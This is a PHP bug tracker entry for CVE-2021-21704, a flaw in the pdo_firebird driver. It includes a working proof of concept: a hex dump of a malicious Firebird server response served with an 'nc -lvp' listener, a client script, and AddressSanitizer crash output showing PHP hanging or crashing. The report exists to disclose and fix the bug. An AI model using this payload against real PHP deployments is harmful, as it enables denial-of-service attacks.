|
|
php.net | support | documentation | report a bug | advanced search | search howto | statistics | random bug | login |
PatchesPull RequestsHistoryAllCommentsChangesGit/SVN commits
[2018-06-11 20:06 UTC] stas@php.net
-Assigned To:
+Assigned To: lwe
[2018-06-11 21:18 UTC] trichimtrich at gmail dot com
[2018-06-28 08:31 UTC] trichimtrich at gmail dot com
[2021-04-30 11:54 UTC] cmb@php.net
-Status: Assigned
+Status: Verified
-Assigned To: lwe
+Assigned To: cmb
[2021-05-05 12:15 UTC] cmb@php.net
-Assigned To: cmb
+Assigned To: stas
[2021-05-05 12:15 UTC] cmb@php.net
[2021-06-21 05:11 UTC] stas@php.net
-CVE-ID:
+CVE-ID: 2021-21704
[2021-06-21 06:22 UTC] stas@php.net
-Private report: No
+Private report: Yes
[2021-06-28 04:41 UTC] git@php.net
[2021-06-28 04:41 UTC] git@php.net
-Status: Verified
+Status: Closed
|
|||||||||||||||||||||||||||
Copyright © 2001-2024 The PHP GroupAll rights reserved. |
Last updated: Sat Nov 23 10:01:28 2024 UTC |
Description: ------------ A bug in pdo_firebase module allows a malicious firebase server or man-in-the-middle attacker to crash PHP. firebird_handle_doer uses response from server without verify the data, and uses wrong type to cast length, leads to crash and hang PHP. Vulnerable code in: \php-src\ext\pdo_firebird\firebird_driver.c: 134 if (result[0] == isc_info_sql_records) { 135: unsigned i = 3, result_size = isc_vax_integer(&result[1], 2); 136 while (result[i] != isc_info_end && i < result_size) { 137: short len = (short) isc_vax_integer(&result[i + 1], 2); 138 if (result[i] != isc_info_req_select_count) { 139: affected_rows += isc_vax_integer(&result[i + 3], len); 140 } 141 i += len + 3; result_size is not verified len uses short type, that we can set len = -3 and make PHP hangs forever. $ ./php --version PHP 7.3.0-dev (cli) (built: Jun 9 2018 04:47:18) ( NTS ) Copyright (c) 1997-2018 The PHP Group Zend Engine v3.3.0-dev, Copyright (c) 1998-2018 Zend Technologies Test script: --------------- $ xxd exec_insert.bin 00000000: 0000 005e ffff 800f 0000 0001 0000 0005 ...^............ 00000010: 0000 0000 0000 000b 4c65 6761 6379 5f41 ........Legacy_A 00000020: 7574 6800 0000 0000 0000 0000 0000 005c uth............\ 00000030: 0000 0000 0000 000b 4c65 6761 6379 5f41 ........Legacy_A 00000040: 7574 6800 0000 0000 0000 0000 0000 0009 uth............. 00000050: 0000 0000 0000 0000 0000 0000 0000 0000 ................ 00000060: 0000 0001 0000 0000 0000 0000 0000 0009 ................ 00000070: 0000 0001 0000 0000 0000 0000 0000 0000 ................ 00000080: 0000 0001 0000 0000 0000 0000 0000 0009 ................ 00000090: 0000 0002 0000 0000 0000 0000 0000 0000 ................ 000000a0: 0000 0001 0000 0000 0000 0000 0000 0009 ................ 000000b0: 0000 0000 0000 0000 0000 0000 0000 001f ................ 000000c0: 1504 0002 0000 001b 0400 0200 0000 0507 ................ 000000d0: 0400 0000 0000 0407 0400 0000 0000 0100 ................ 000000e0: 0000 0001 0000 0000 0000 0000 0000 0009 ................ 000000f0: 0000 0001 0000 0000 0000 0000 0000 0000 ................ 00000100: 0000 0001 0000 0000 0000 0000 0000 0009 ................ 00000110: 0000 0002 0000 0000 0000 0000 0000 0021 ...............! 00000120: 17ff ff0f feff 1000 0000 1004 0000 0000 ................ 00000130: 000d 0400 0000 0000 0e04 0001 0000 0002 ................ 00000140: 0100 0000 0000 0001 0000 0000 0000 0000 ................ 00000150: 0000 0009 0000 0000 0000 0000 0000 0000 ................ 00000160: 0000 0000 0000 0001 0000 0000 0000 0000 ................ 00000170: 0000 0009 ffff ffff 0000 0000 0000 0000 ................ 00000180: 0000 0000 0000 0001 0000 0000 0000 0000 ................ 00000190: 0000 0009 0000 0000 0000 0000 0000 0000 ................ 000001a0: 0000 0000 0000 0001 0000 0000 0000 0000 ................ 000001b0: 0000 0009 0000 0000 0000 0000 0000 0000 ................ 000001c0: 0000 0000 0000 0001 0000 0000 0000 0000 ................ $ nc -lvp 3050 < exec_insert.bin $ cat fire_exec.php <?php $dsn = 'firebird:dbname=localhost:employee;charset=utf8;'; $username = 'SYSDBA'; $password = 'masterkey'; $dbh = new PDO($dsn, $username, $password, [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]); echo $dbh->exec("INSERT INTO test VALUES ('hihi2', 'xxxxx')"); ?> Expected result: ---------------- No crash No hang Actual result: -------------- $ ./php fire_exec.php ASAN:DEADLYSIGNAL ================================================================= ==5319==ERROR: AddressSanitizer: stack-overflow on address 0x7fffd615faa1 (pc 0x000000cd9655 bp 0x7fffd6157590 sp 0x7fffd6157240 T0) #0 0xcd9654 in firebird_handle_doer (/mnt/hgfs/share/htdocs/php+0xcd9654) #1 0xcbd411 in zim_PDO_exec (/mnt/hgfs/share/htdocs/php+0xcbd411) #2 0x12e2d9f in ZEND_DO_FCALL_SPEC_RETVAL_USED_HANDLER (/mnt/hgfs/share/htdocs/php+0x12e2d9f) #3 0x1212bcf in execute_ex (/mnt/hgfs/share/htdocs/php+0x1212bcf) #4 0x121320b in zend_execute (/mnt/hgfs/share/htdocs/php+0x121320b) #5 0x11175c0 in zend_execute_scripts (/mnt/hgfs/share/htdocs/php+0x11175c0) #6 0xfa4878 in php_execute_script (/mnt/hgfs/share/htdocs/php+0xfa4878) #7 0x1412cc4 in do_cli (/mnt/hgfs/share/htdocs/php+0x1412cc4) #8 0x1410e67 in main (/mnt/hgfs/share/htdocs/php+0x1410e67) #9 0x7f6c837b782f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #10 0x43d878 in _start (/mnt/hgfs/share/htdocs/php+0x43d878) SUMMARY: AddressSanitizer: stack-overflow (/mnt/hgfs/share/htdocs/php+0xcd9654) in firebird_handle_doer ==5319==ABORTING